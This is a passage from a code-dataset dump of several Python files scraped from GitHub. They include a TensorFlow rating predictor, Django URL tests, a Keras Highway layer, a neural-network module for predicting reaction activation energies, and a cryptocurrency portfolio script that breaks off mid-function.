1], c=c, label=label)\nplt.legend()\nplt.show()\nplt.savefig('CNN_tsne.png')\n'''\n","repo_name":"kkeen699/DLCV-spring2019","sub_path":"hw4/p1/p1_video2cnn.py","file_name":"p1_video2cnn.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23987919571","text":"import tensorflow as tf\r\n\r\nclass RatingPrediction():\r\n def __init__(self, para_dict):\r\n self.para_dict = para_dict\r\n\r\n def rating_prediction(self, embeded_uid, embeded_iid, input_y):\r\n Wu = tf.get_variable('Wru', [self.para_dict['embedding_id_size'], self.para_dict['n_latent']])\r\n self.u_feas = tf.matmul(embeded_uid, Wu)\r\n\r\n Wi = tf.get_variable('Wri', [self.para_dict['embedding_id_size'], self.para_dict['n_latent']])\r\n self.i_feas = tf.matmul(embeded_iid, Wi)\r\n\r\n Br = tf.get_variable('Wrb', [self.para_dict['n_latent']])\r\n feas = tf.sigmoid(self.u_feas + self.i_feas + Br)\r\n\r\n for i in range(0, 1):\r\n Wr = tf.get_variable('Wr' + str(i), [self.para_dict['n_latent'], self.para_dict['n_latent']])\r\n Br = tf.get_variable('Wb' + str(i), 
[self.para_dict['n_latent']]) # name:新变量或现有变量的名称,这个参数是必须的,函数会根据变量名称去创建或者获取变量\r\n feas = tf.sigmoid(tf.matmul(feas, Wr) + Br)\r\n\r\n Wrr = tf.get_variable('Wrr', [self.para_dict['n_latent'], 1])\r\n Brr = tf.get_variable('Wbr', [1])\r\n r = tf.matmul(feas, Wrr) + Brr\r\n mse = tf.reduce_mean(tf.square(input_y - r))\r\n rmse = tf.sqrt(tf.reduce_mean(tf.square(input_y - r)))\r\n mae = tf.reduce_mean(tf.abs(input_y - r))\r\n return r, feas, mse, rmse, mae\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Anxbbq/EMER","sub_path":"Model/rating_predicting.py","file_name":"rating_predicting.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"22204694443","text":"\"\"\"App drf url tests.\n\"\"\"\n\nimport pytest\nfrom django.urls import resolve, reverse\n\npytestmark = pytest.mark.django_db\n\n\ndef test_camera_task_detail(camera_task):\n \"\"\"test_camera_task_detail.\"\"\"\n assert (\n reverse(\"api:cameratask-detail\", kwargs={\"pk\": camera_task.id})\n == f\"/api/camera_tasks/{camera_task.id}\"\n )\n assert (\n resolve(f\"/api/camera_tasks/{camera_task.id}\").view_name\n == \"api:cameratask-detail\"\n )\n\n\ndef test_camera_task_list():\n \"\"\"test_camera_task_list.\"\"\"\n assert reverse(\"api:cameratask-list\") == \"/api/camera_tasks\"\n assert resolve(\"/api/camera_tasks\").view_name == \"api:cameratask-list\"\n","repo_name":"Azure-Samples/azure-intelligent-edge-patterns","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/camera_tasks/tests/test_drf_urls.py","file_name":"test_drf_urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"31"} +{"seq_id":"26615818312","text":"from keras.engine import Layer, InputSpec\nfrom keras import regularizers\nfrom keras import constraints\nfrom keras import activations\nfrom keras import initializers\n\n\nclass Highway(Layer):\n \"\"\"Densely connected highway network.\n Highway layers are a natural extension of LSTMs to feedforward networks.\n # Arguments\n init: name of initialization function for the weights of the layer\n (see [initializations](../initializations.md)),\n or alternatively, Theano function to use for weights\n initialization. This parameter is only relevant\n if you don't pass a `weights` argument.\n activation: name of activation function to use\n (see [activations](../activations.md)),\n or alternatively, elementwise Theano function.\n If you don't specify anything, no activation is applied\n (ie. \"linear\" activation: a(x) = x).\n weights: list of Numpy arrays to set as initial weights.\n The list should have 2 elements, of shape `(input_dim, output_dim)`\n and (output_dim,) for weights and biases respectively.\n W_regularizer: instance of [WeightRegularizer](../regularizers.md)\n (eg. L1 or L2 regularization), applied to the main weights matrix.\n b_regularizer: instance of [WeightRegularizer](../regularizers.md),\n applied to the bias.\n activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),\n applied to the network output.\n W_constraint: instance of the [constraints](../constraints.md) module\n (eg. maxnorm, nonneg), applied to the main weights matrix.\n b_constraint: instance of the [constraints](../constraints.md) module,\n applied to the bias.\n bias: whether to include a bias\n (i.e. make the layer affine rather than linear).\n input_dim: dimensionality of the input (integer). 
This argument\n (or alternatively, the keyword argument `input_shape`)\n is required when using this layer as the first layer in a model.\n # Input shape\n 2D tensor with shape: `(nb_samples, input_dim)`.\n # Output shape\n 2D tensor with shape: `(nb_samples, input_dim)`.\n # References\n - [Highway Networks](http://arxiv.org/abs/1505.00387v2)\n \"\"\"\n\n def __init__(self,\n init='glorot_uniform',\n activation=None,\n weights=None,\n W_regularizer=None,\n b_regularizer=None,\n activity_regularizer=None,\n W_constraint=None,\n b_constraint=None,\n bias=True,\n input_dim=None,\n **kwargs):\n if 'transform_bias' in kwargs:\n kwargs.pop('transform_bias')\n self.init = initializers.get(init)\n self.activation = activations.get(activation)\n\n self.W_regularizer = regularizers.get(W_regularizer)\n self.b_regularizer = regularizers.get(b_regularizer)\n self.activity_regularizer = regularizers.get(activity_regularizer)\n\n self.W_constraint = constraints.get(W_constraint)\n self.b_constraint = constraints.get(b_constraint)\n\n self.bias = bias\n self.initial_weights = weights\n self.input_spec = InputSpec(ndim=2)\n\n self.input_dim = input_dim\n if self.input_dim:\n kwargs['input_shape'] = (self.input_dim,)\n super(Highway, self).__init__(**kwargs)\n\n def build(self, input_shape):\n input_dim = input_shape[1]\n self.input_spec = InputSpec(dtype=K.floatx(),\n shape=(None, input_dim))\n\n self.W = self.add_weight((input_dim, input_dim),\n initializer=self.init,\n name='W',\n regularizer=self.W_regularizer,\n constraint=self.W_constraint)\n self.W_carry = self.add_weight((input_dim, input_dim),\n initializer=self.init,\n name='W_carry')\n if self.bias:\n self.b = self.add_weight((input_dim,),\n initializer='zero',\n name='b',\n regularizer=self.b_regularizer,\n constraint=self.b_constraint)\n self.b_carry = self.add_weight((input_dim,),\n initializer='one',\n name='b_carry')\n else:\n self.b_carry = None\n\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n self.built = True\n\n def call(self, x):\n y = K.dot(x, self.W_carry)\n if self.bias:\n y += self.b_carry\n transform_weight = activations.sigmoid(y)\n y = K.dot(x, self.W)\n if self.bias:\n y += self.b\n act = self.activation(y)\n act *= transform_weight\n output = act + (1 - transform_weight) * x\n return output\n\n def get_config(self):\n config = {'init': initializers.serialize(self.init),\n 'activation': activations.serialize(self.activation),\n 'W_regularizer': regularizers.serialize(self.W_regularizer),\n 'b_regularizer': regularizers.serialize(self.b_regularizer),\n 'activity_regularizer':\n regularizers.serialize(self.activity_regularizer),\n 'W_constraint': constraints.serialize(self.W_constraint),\n 'b_constraint': constraints.serialize(self.b_constraint),\n 'bias': self.bias,\n 'input_dim': self.input_dim}\n base_config = super(Highway, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))","repo_name":"BigDaMa/ExampleDrivenErrorDetection","sub_path":"model/ml/active_learning/classifier_one/HighWay.py","file_name":"HighWay.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"36432795862","text":"'''KPM Neural Network Training Module\n\nUsed to create new KPM models and test their accuracy on\ngiven molecular datasets.\n'''\n\nfrom KPM.utils.data_funcs import load_dataset, extract_data, split_data\nfrom KPM.utils.data_funcs import normalise, 
un_normalise\nfrom KPM.utils.descriptors import calc_diffs\n\nfrom sklearn import preprocessing\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.model_selection import GridSearchCV, KFold\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom sklearn.utils import shuffle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport json\n\nfrom numpy.typing import ArrayLike\n\nclass ModelTrainer:\n '''Trains a neural network on a dataset of reactions.\n \n Takes in all required arguments through train_args.\n Datasets should be provided as csv files in the same\n format as the supplied b97d3 dataset.\n\n Arguments:\n args: argparse Namespace from CLI.\n '''\n def __init__(self, args):\n '''Initialise class from supplied CLI arguments.'''\n\n print('--------------------------------------------')\n print('KPM Model Training')\n print('--------------------------------------------\\n')\n\n self.argparse_args = args\n\n self.dataset = args.dataset\n self.num_reacs = args.num_reacs\n\n self.model_out = args.model_out\n self.train_direction = args.train_direction\n self.separate_test_dataset = args.separate_test_dataset\n self.separate_train_dataset = args.separate_train_dataset\n self.norm_type = args.norm_type\n self.norm_eacts = True if args.norm_eacts == 'True' else False\n self.split_method = args.split_method\n self.split_ratio = args.split_ratio\n self.split_num = args.split_num\n self.split_index_path = args.split_index_path\n self.random_seed = args.random_seed\n self.training_prediction_dir = args.training_prediction_dir\n self.save_test_train_path = args.save_test_train_path\n self.plot_dir = args.plot_dir\n self.do_hyperparams = True if args.opt_hyperparams == 'True' else False\n self.hyperparam_jobs = args.opt_hyperparams_jobs\n self.hyperparam_file = args.opt_hyperparams_file\n self.nn_activation_function = args.nn_activation_function\n self.nn_ensemble_size = args.nn_ensemble_size\n self.nn_solver = args.nn_solver\n self.nn_layers = [args.nn_layers] if type(args.nn_layers) == int else args.nn_layers\n self.nn_alpha = args.nn_alpha\n self.nn_max_iters = args.nn_max_iters\n self.nn_learning_rate = args.nn_learning_rate\n self.nn_learning_rate_init = args.nn_learning_rate_init\n self.nn_out_activation = args.nn_out_activation\n self.nn_learning_rate_max = args.nn_learning_rate_max # Not used yet, doesn't look like this is an option.\n self.descriptor_type = args.descriptor_type # Only MorganF currently implemented.\n self.similarity_type = args.similarity_type # Not used yet.\n self.smiles_type = args.smiles_type # Not used yet.\n self.morgan_num_bits = args.morgan_num_bits\n self.morgan_radius = args.morgan_radius\n self.verbose = True if args.verbose == 'True' else False\n\n # Sanitise input for separate test/train datasets.\n if self.separate_train_dataset is not None:\n if self.separate_test_dataset is None:\n raise ValueError('If separate_train_dataset is specified, separate_test_dataset must also be specified.')\n elif self.separate_test_dataset is not None:\n if self.separate_train_dataset is None:\n raise ValueError('If separate_test_dataset is specified, separate_train_dataset must also be specified.')\n\n # Modify number of reactions based on train_direction.\n if self.train_direction == 'both':\n self.num_reacs = 2*self.num_reacs\n\n # Set up the neural network hyperparameter dictionary.\n self.nn_params = {\n 'hidden_layer_sizes': self.nn_layers,\n 'activation': self.nn_activation_function,\n 'solver': self.nn_solver,\n 
'alpha': self.nn_alpha,\n 'learning_rate': self.nn_learning_rate,\n 'learning_rate_init': self.nn_learning_rate_init,\n 'max_iter': self.nn_max_iters,\n 'random_state': self.random_seed\n }\n\n\n def process(self):\n '''Process the data into training and test datasets.'''\n # If loading a single combined dataset that needs to be split...\n if self.separate_test_dataset is None:\n print('Taking train/test data from a single dataset.')\n ea, dh, rs, ps = load_dataset(self.dataset)\n\n # Extract and transform data dependent on train_direction.\n Eact, dH, rmol, pmol = extract_data(ea, dh, rs, ps, self.num_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact)\n avg_dH = np.mean(dH)\n if self.verbose:\n print(f'\\nLength of Eact = {len(Eact)}, Mean Eact = {avg_Eact} kcal/mol')\n print(f'Length of dH = {len(dH)}, Mean dH = {avg_dH} kcal/mol')\n print(f'Total number of MOL objects = {len(rmol)}\\n')\n\n # Normalise Eact.\n std_Eact = np.std(Eact)\n if self.norm_eacts:\n Eact = normalise(Eact, avg_Eact, std_Eact, self.norm_type)\n\n if self.verbose: print('Data sorted. Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs = calc_diffs(self.num_reacs, self.descriptor_type, rmol, pmol, dH, \n self.morgan_radius, self.morgan_num_bits)\n\n print('Fingerprint calculation complete.')\n if self.verbose: print(f'\\nSplitting train/test data.')\n\n # Split data into train/test sets.\n X_train, X_test, y_train, y_test = split_data('train_test_split', diffs, Eact, self.split_ratio,\n self.random_seed, index_path=self.split_index_path,\n verbose=self.verbose)\n # Else if loading separate train/test datasets...\n else:\n print('Taking train/test data from separate datasets.')\n ea_train, dh_train, rs_train, ps_train = load_dataset(self.separate_train_dataset)\n ea_test, dh_test, rs_test, ps_test = load_dataset(self.separate_test_dataset)\n\n # Extract and transform data dependent on train_direction.\n num_train_reacs = len(ea_train)\n num_test_reacs = len(ea_test)\n Eact_train, dH_train, rmol_train, pmol_train = extract_data(ea_train, dh_train, rs_train, ps_train, \n num_train_reacs, self.train_direction)\n Eact_test, dH_test, rmol_test, pmol_test = extract_data(ea_test, dh_test, rs_test, ps_test, \n num_test_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact_train)\n avg_dH_train = np.mean(dH_train)\n avg_Eact_test = np.mean(Eact_test)\n avg_dH_test = np.mean(dH_test)\n if self.verbose:\n print(f'Length of Eact (train) = {len(Eact_train)}, Mean Eact (train) = {avg_Eact} kcal/mol')\n print(f'Length of dH (train) = {len(dH_train)}, Mean dH (train) = {avg_dH_train} kcal/mol')\n print(f'Total number of training MOL objects = {len(rmol_train)}')\n print(f'Length of Eact (test) = {len(Eact_test)}, Mean Eact (test) = {avg_Eact_test} kcal/mol')\n print(f'Length of dH (test) = {len(dH_test)}, Mean dH (test) = {avg_dH_test} kcal/mol')\n print(f'Total number of testing MOL objects = {len(rmol_test)}')\n\n # Normalise Eact from training data.\n std_Eact = np.std(Eact_train)\n if self.norm_eacts:\n Eact_train = normalise(Eact_train, avg_Eact, std_Eact, self.norm_type)\n Eact_test = normalise(Eact_test, avg_Eact, std_Eact, self.norm_type)\n\n if self.verbose: print('Data sorted. 
Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs_train = calc_diffs(num_train_reacs, self.descriptor_type, rmol_train, pmol_train, dH_train,\n self.morgan_radius, self.morgan_num_bits)\n diffs_test = calc_diffs(num_test_reacs, self.descriptor_type, rmol_test, pmol_test, dH_test,\n self.morgan_radius, self.morgan_num_bits)\n\n print('Fingerprint calculation complete.')\n\n X_train = diffs_train\n X_test = diffs_test\n y_train = Eact_train\n y_test = Eact_test\n\n if self.save_test_train_path is not None:\n np.savez(self.save_test_train_path, X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)\n if self.verbose: print(f'Saved train/test data to {self.save_test_train_path}.\\n')\n\n print('Train/test data ready.')\n\n self.norm_avg_Eact = avg_Eact\n self.norm_std_Eact = std_Eact\n return X_train, X_test, y_train, y_test\n\n\n def opt_hyperparams(self, X_train: ArrayLike, y_train: ArrayLike):\n '''Optimises hyperparameters of an MLPRegressor.\n\n Arguments:\n X_train: Array of reaction difference fingerprints.\n y_train: Array of normalised activation energies.\n '''\n if self.hyperparam_file is None:\n # Search over a default parameter space.\n param_grid = {\n 'hidden_layer_sizes': [(100,), (200,), (300,), (100, 100,), (200, 200,)],\n 'alpha': [1e-5, 1e-4, 1e-3],\n 'learning_rate_init': [1e-4, 1e-3, 1e-2],\n 'max_iter': [200, 500, 1000]\n }\n else:\n with open(self.hyperparam_file, 'r') as f:\n param_grid = json.load(f)\n\n search_keys = param_grid.keys()\n for key in search_keys:\n if key in self.nn_params.keys():\n self.nn_params.pop(key)\n\n est = MLPRegressor(**self.nn_params)\n cv = KFold(4)\n gs = GridSearchCV(est, param_grid, cv=cv, n_jobs=self.hyperparam_jobs, verbose=3)\n gs.fit(X_train, y_train)\n \n return gs.best_params_\n\n\n def run(self, X_train: ArrayLike, y_train: ArrayLike):\n '''Runs the model training procedure.\n \n Arguments:\n X_train: Array of reaction difference fingerprints.\n y_train: Array of normalised activation energies.\n '''\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train_scaled = scaler.transform(X_train)\n if self.verbose: print('Scaled data.')\n\n if self.do_hyperparams:\n print('Running hyperparameter optimisation.')\n # Note that this removes all keys being optimised from `self.nn_params`\n regr_params = self.opt_hyperparams(X_train_scaled, y_train)\n if self.verbose: \n print('Optimised hyperparameters: ')\n print(regr_params)\n # Re-add the optimised hyperparameters.\n self.nn_params = {**self.nn_params, **regr_params}\n\n print(f'Training {self.nn_ensemble_size} neural networks.')\n regr = []\n for i in range(self.nn_ensemble_size):\n if self.verbose: print(f'Training NN {i+1}...')\n rs = self.random_seed+i if self.random_seed is not None else None\n X, y = shuffle(X_train_scaled, y_train, random_state=rs)\n self.nn_params['random_state'] = rs\n if self.nn_out_activation != 'identity':\n # This trick is required to bypass the initializer, which enforces identity.\n self.nn_params['warm_start'] = True\n nn = MLPRegressor(**self.nn_params)\n nn.partial_fit(X, y)\n nn.out_activation_ = self.nn_out_activation\n regr.append(nn.fit(X, y))\n else:\n nn = MLPRegressor(**self.nn_params)\n regr.append(nn.fit(X, y))\n\n if self.verbose: print(f'Saving models to {self.model_out}')\n print('Training complete!\\n')\n \n norm_vars = [self.norm_avg_Eact, self.norm_std_Eact]\n np.savez(self.model_out, models=regr, scaler=scaler, norm_vars=norm_vars, 
args=self.argparse_args)\n\n\nclass ModelTester:\n '''Tests prediction accuracy of a KPM model.\n \n Loads in a previously trained model, extracting arguments\n directly from it. Uses a secondary dataset as test data,\n and predicts Eact values for this dataset, producing a\n correlation plot for these predictions.\n\n Arguments:\n model_path: Path to pickle file containing KPM model(s).\n test_args: argparse Namespace from running KPM in 'test' mode.\n '''\n def __init__(self, model_path: str, test_dataset: str = None, test_num_reacs: int = None,\n plot_dir: str = './', verbose: str = 'False'):\n '''Initialise KPM model tester.'''\n\n print('--------------------------------------------')\n print('KPM Model Testing')\n self.verbose = True if verbose == 'True' else False\n\n model = np.load(model_path, allow_pickle=True)\n self.regr = model['models']\n self.scaler = model['scaler'][()] # scaler gets saved as a 0D array.\n norm_vars = model['norm_vars']\n self.norm_avg_Eact = norm_vars[0]\n self.norm_std_Eact = norm_vars[1]\n self.training_args = model['args'][()] # args gets saved as a 0D array.\n args = self.training_args\n\n self.orig_dataset = args.dataset\n self.orig_num_reacs = args.num_reacs\n self.model_out = args.model_out\n self.train_direction = args.train_direction\n self.separate_test_dataset = args.separate_test_dataset\n self.separate_train_dataset = args.separate_train_dataset\n self.norm_type = args.norm_type\n self.norm_eacts = True if args.norm_eacts == 'True' else False\n self.split_method = args.split_method\n self.split_ratio = args.split_ratio\n self.split_num = args.split_num\n self.split_index_path = args.split_index_path\n self.random_seed = args.random_seed\n self.training_prediction_dir = args.training_prediction_dir\n self.save_test_train_path = args.save_test_train_path\n self.plot_dir = args.plot_dir\n self.nn_activation_function = args.nn_activation_function\n self.nn_ensemble_size = args.nn_ensemble_size\n self.nn_solver = args.nn_solver\n self.nn_learning_rate = args.nn_learning_rate\n self.nn_learning_rate_init = args.nn_learning_rate_init\n self.nn_learning_rate_max = args.nn_learning_rate_max # Not used yet, doesn't look like this is an option.\n self.descriptor_type = args.descriptor_type\n self.similarity_type = args.similarity_type # Not used yet.\n self.smiles_type = args.smiles_type # Not used yet.\n self.morgan_num_bits = args.morgan_num_bits\n self.morgan_radius = args.morgan_radius\n\n # \n if test_dataset is not None:\n print(f'Testing with data from {test_dataset}')\n self.dataset = test_dataset\n self.num_reacs = test_num_reacs\n self.plot_dir = plot_dir\n # Modify number of reactions based on train_direction.\n if self.train_direction == 'both':\n self.num_reacs = 2*self.num_reacs\n else:\n print('Testing with data from original test/train split.')\n\n print('--------------------------------------------\\n')\n\n\n def process_test_data(self):\n '''Process a new dataset into X_test and y_test arrays.\n \n When in test-only mode and provided with a new dataset of\n reactions, runs through the process of extracting data\n and creating a test set to run predictions on.\n '''\n if self.dataset is None:\n raise RuntimeError('This function can only be run when new test data is provided!')\n\n print('Loading in new test dataset.\\n')\n # print(self.dataset, type(self.dataset))\n ea, dh, rs, ps = load_dataset(self.dataset)\n\n # Extract and transform data dependent on train_direction.\n Eact, dH, rmol, pmol = extract_data(ea, dh, rs, ps, 
self.num_reacs, self.train_direction)\n\n avg_Eact = np.mean(Eact)\n avg_dH = np.mean(dH)\n if self.verbose:\n print(f'\\nLength of Eact = {len(Eact)}, Mean Eact = {avg_Eact} kcal/mol')\n print(f'Length of dH = {len(dH)}, Mean dH = {avg_dH} kcal/mol')\n print(f'Total number of MOL objects = {len(rmol)}\\n')\n\n # Normalise Eact\n Eact = normalise(Eact, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n\n if self.verbose: print('Data loaded. Calculating reaction difference fingerprints.')\n\n # Calculate reaction difference fingerprints.\n diffs = calc_diffs(self.num_reacs, self.descriptor_type, rmol, pmol, dH, self.morgan_radius, self.morgan_num_bits)\n print('Fingerprint calculation complete.')\n\n return diffs, Eact\n\n\n def predict(self, X: ArrayLike, y: ArrayLike, data_type):\n '''Use the loaded model to predict Eact for a train/test dataset.\n \n Generic function to predict Eact values for either training or\n test data across an ensemble of neural networks. Uses actual Eact\n values for the given reactions to return R**2 values for each\n model in the ensemble.\n \n Arguments:\n X: Array of reaction difference fingerprints.\n y: Actual Eact values for these reactions.\n data_type: Either 'train' or 'test', determines verbose output.\n '''\n if data_type not in ['train', 'test']:\n raise ValueError('Unknown data_type! Must be either \\'train\\' or \\'test\\'.')\n\n print(f'Predicting Eact values for {data_type}ing data.')\n if self.verbose:\n print(f'Predicting Eact across {self.nn_ensemble_size} NNs.\\n')\n\n n_reacs = len(X)\n X = self.scaler.transform(X)\n\n Eact_pred = np.zeros((n_reacs, self.nn_ensemble_size))\n r2s = np.zeros(self.nn_ensemble_size)\n for i in range(self.nn_ensemble_size):\n pred = self.regr[i].predict(X)\n # Reverse normalisation if Eacts were normalised in training.\n if self.norm_eacts:\n pred = un_normalise(pred, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n Eact_pred[:, i] = pred\n r2 = self.regr[i].score(X, y)\n r2s[i] = r2\n if self.verbose: print(f'NN{i} R2 = {r2}')\n\n Eacts = np.mean(Eact_pred, axis=1)\n uncerts = np.std(Eact_pred, axis=1)\n if self.verbose: print(f'Average R2 = {np.mean(r2s)}')\n\n # Save predictions if requested.\n if self.training_prediction_dir is not None:\n save_path = os.path.join(self.training_prediction_dir, f'Eact_pred_{data_type}.npz')\n np.savez(save_path, Eacts=Eacts, uncerts=uncerts)\n if self.verbose: print(f'Predictions saved to {save_path}\\n')\n\n return Eacts, uncerts\n\n \n def plot_correlation(self, y_true: ArrayLike, y_pred: ArrayLike, y_uncert: ArrayLike, data_type: str):\n '''Use the loaded model to plot correlation between predicted and actual Eact values.\n \n Generic function to plot correlation plots for either training or\n test data. Prints a variety of error metrics for given data.\n\n Arguments:\n y_true: Actual Eact values for reactions in dataset.\n y_pred: Predicted Eact values for reactions in dataset.\n y_uncert: Uncertainties in predicted Eact values.\n data_type: Either 'train' or 'test', determines plot wording and colours.\n '''\n if data_type not in ['train', 'test']:\n raise ValueError('Unknown data_type! 
Must be either \\'train\\' or \\'test\\'.')\n\n print(f'Analysis on {data_type}ing data prediction:')\n\n # Un-normalise true data if it was normalised in training.\n if self.norm_eacts:\n y_true = un_normalise(y_true, self.norm_avg_Eact, self.norm_std_Eact, self.norm_type)\n \n # Calculate error metrics.\n mse = mean_squared_error(y_true, y_pred)\n rmse = np.sqrt(mse)\n mae = mean_absolute_error(y_true, y_pred)\n\n print(f'Mean Absolute Error (MAE) in {data_type}ing data prediction: {mae} kcal/mol')\n print(f'Mean Squared Error (MSE) in {data_type}ing data prediction: {mse} kcal/mol')\n print(f'Root Mean Squared Error (RMSE) in {data_type}ing data prediction: {rmse} kcal/mol\\n')\n\n # Plot correlation.\n if self.verbose: print('Plotting correlation between true and predicted values.')\n col = 'blue' if data_type == 'train' else 'purple'\n fignum = 1 if data_type == 'train' else 2\n\n fig = plt.figure(fignum, figsize=(8, 6), dpi=100)\n ax = plt.gca()\n plt.plot(y_true, y_true, color='orange', lw=3)\n plt.errorbar(y_true, y_pred, yerr=y_uncert, fmt='o', color=col, mfc='white', markersize=8, mew=2, alpha=0.5)\n plt.text(0.02, 0.98, f'MAE: {mae:.3f} kcal/mol\\nRMSE: {rmse:.3f} kcal/mol',\n horizontalalignment='left', verticalalignment='top', \n fontsize=16, transform=ax.transAxes)\n plt.ylabel(r\"Predicted E$_a$ (kcal/mol)\", fontsize=16)\n plt.xlabel(r\"True E$_a$ (kcal/mol)\", fontsize=16)\n plt.yticks(fontsize=16)\n plt.xticks(fontsize=16)\n fig.tight_layout()\n if self.plot_dir is not None:\n save_path = os.path.join(self.plot_dir, f'corr_{data_type}.png')\n if not os.path.exists(self.plot_dir): os.mkdir(self.plot_dir)\n plt.savefig(save_path, dpi=300)\n if self.verbose: print(f'Saved plot to {save_path}\\n')\n \n plt.pause(0.01)","repo_name":"idilismail/KineticPredictorModel","sub_path":"KPM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":22239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41488204228","text":"import decimal\nimport csv\nfrom typing import List, Tuple\nimport sys\n\nfrom pycoingecko import CoinGeckoAPI # type: ignore\n\nfrom supported_coins import supported_coins\n\n\ncg = CoinGeckoAPI()\nPORTFOLIO_FILE: str = \"portfolio.csv\"\n\n\ndef valid_args(ticker: str, amount: str) -> bool:\n \"\"\"\n Combines two functions to check if the user's input is correct\n :param ticker: ticker for the coin typed by the user\n :param amount: amount of the coin typed by the users\n :return: True if all arguments are correct of r False if one is wrong\n \"\"\"\n if valid_coin(ticker) and valid_amount(amount):\n return True\n else:\n return False\n\n\ndef valid_coin(ticker: str) -> bool:\n \"\"\"\n Checks if the coin typed by the user is supported by the program.\n\n The list of supported coins was parsed from the CoinGecko API\n and comprises the top 100 coins by market cap in november/2022.\n :param ticker: ticker of the coin typed by the user\n :return: True if the coin is supported. If not the program closes with\n an error message\n \"\"\"\n for coin in supported_coins:\n if coin[\"symbol\"] != ticker:\n continue\n else:\n return True\n sys.exit(\"ERROR: invalid coin\")\n\n\ndef valid_amount(amount: str) -> bool:\n \"\"\"\n Checks if the amount typed by the user is a number (int or float)\n and if it is positive\n :param amount: amount typed by the user\n :return: True if the amount is valid. 
If not the program closes with\n an error message\n \"\"\"\n try:\n float(amount)\n if float(amount) < 0:\n sys.exit(\"ERROR: amount must be a positive number\")\n else:\n return True\n except ValueError:\n sys.exit(\"ERROR: amount must be a positive number\")\n\n\ndef read_csv(filename: str) -> List[dict]:\n \"\"\"\n Reads the portfolio file to perform operations with them\n :param filename: name of the portfolio file\n :return: a list containing one dict for each coin in the portfolio\n \"\"\"\n with open(filename, newline=\"\") as readfile:\n reader = csv.DictReader(readfile)\n return [row for row in reader]\n\n\ndef write_csv(filename: str, values: List[dict]) -> None:\n \"\"\"\n After any operation is done in with the values this function\n will write the modified data to the portfolio file\n :param filename: name of the portfolio file\n :param values: list of dicts with modifications\n :return: None\n \"\"\"\n fieldnames: list = [\"id\", \"ticker\", \"amount\"]\n with open(filename, \"w\", newline=\"\") as writefile:\n writer = csv.DictWriter(writefile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(values)\n\n\ndef deposit(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n if in_portfolio(ticker):\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = decimal.Decimal(coin[\"amount\"]) + decimal.Decimal(amount)\n else:\n portfolio.append({\"ticker\": ticker, \"amount\": amount, \"id\": get_coin_id(ticker)})\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef withdraw(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n if in_portfolio(ticker):\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = decimal.Decimal(coin[\"amount\"]) - decimal.Decimal(amount)\n if coin[\"amount\"] < 0:\n sys.exit(\"ERROR: not enough funds to withdraw\")\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef update(ticker: str, amount: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n coin[\"amount\"] = amount\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n\ndef erase(ticker: str) -> None:\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n if coin[\"ticker\"] == ticker:\n portfolio.remove(coin)\n\n if input(f\"ERASE {str(ticker).upper()}? (y/n)\\n\").lower() == \"y\":\n write_csv(PORTFOLIO_FILE, portfolio)\n else:\n sys.exit(\"Operation cancelled\")\n\n\ndef reset() -> None:\n if input(f\"RESET portfolio? 
